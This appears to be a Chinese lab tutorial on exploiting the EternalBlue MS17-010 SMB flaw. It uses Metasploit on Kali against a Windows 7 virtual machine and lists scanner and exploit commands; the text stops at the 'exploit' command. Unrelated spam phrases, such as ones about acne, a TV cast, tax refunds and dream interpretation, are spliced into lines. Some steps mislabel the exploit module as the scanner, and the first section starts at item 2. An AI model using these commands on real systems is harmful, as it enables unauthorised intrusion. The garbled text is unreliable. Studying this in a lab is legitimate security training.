永恒之蓝ms17-010漏洞利⽤(提取meterpreter权限获取shell,进⼊win。。。⽂章⽬录
⼀、漏洞原理
2、SMB服务在Windows与UNIX系列OS之间搭起⼀座桥梁,让两者的资源可互通有⽆。
-----想了解SMB具体漏洞原理可以点击链接: .
⼆、需要⼯具
额头上长痤疮怎么办1、windows系统(靶机)
我这⾥使⽤的是在虚拟机⾥新建的win7系统
2、kali linux系统(攻击机)
我这⾥使⽤的是kali2020版本
三、漏洞验证
1、进⼊win7的cmd⾥查看windows系统的IP地址为:192.168.60.137十八岁天空演员表
2、打开kali—漏洞利⽤⼯具集—metasploit framework,双击进⼊
3、等⼯具⾃⼰跑完后,成功进⼊msf,就可以敲命令啦
4、使⽤auxiliary/scanner/smb/smb_ms17_010模块(主要是为了扫描看⽬标靶机是否存在ms17-010漏洞)
msf5 > use auxiliary/scanner/smb/smb_ms17_010
5、查看auxiliary/scanner/smb/smb_ms17_010模块的配置信息
msf5 auxiliary(scanner/smb/smb_ms17_010)> show options
运⾏后会显⽰auxiliary/scanner/smb/smb_ms17_010模块的所有配置信息qq面板分组
黄渤 电影
6、在扫描模块⾥设置win7靶机的IP:192.168.60.137
msf5 auxiliary(scanner/smb/smb_ms17_010)>set rhost 192.168.60.137
运⾏后会⾃动返回rhost→192.168.60.137
7、设置完成后,模块对⽬标靶机进⾏扫描
msf5 auxiliary(scanner/smb/smb_ms17_010)> run退税操作流程
显然,扫描并未显⽰出现ms17-010漏洞
这是因为防⽕墙给挡住了,接下来将防⽕墙关闭,在运⾏下试试
可以看到,把防⽕墙关闭后,重新扫描出了ms17-010漏洞,所以win7靶机存在“永恒之蓝”漏洞
四、漏洞攻击
1、搜索ms17-010漏洞利⽤模块
msf5 auxiliary(scanner/smb/smb_ms17_010)> search ms17-010
会显⽰所有ms17-010漏洞可以利⽤的模块信息
2、使⽤auxiliary(scanner/smb/smb_ms17_010)模块(进⾏攻击)
msf5 auxiliary(scanner/smb/smb_ms17_010)> use exploit/windows/smb/ms17_010_eternalblue 3、查看auxiliary(scanner/smb/smb_ms17_010)模块的配置信息
msf5 exploit(windows/smb/ms17_010_eternalblue)> show options
会显⽰auxiliary(scanner/smb/smb_ms17_010)模块的所有配置信息
4、接下来,在攻击模块⾥设置win7靶机的IP
msf5 exploit(windows/smb/ms17_010_eternalblue)>set rhost 192.168.60.137
运⾏后会⾃动返回rhost→192.168.60.137
5、使⽤exploit或run命令进⾏攻击周公解梦梦见杀鱼
msf5 exploit(windows/smb/ms17_010_eternalblue)> exploit
发布评论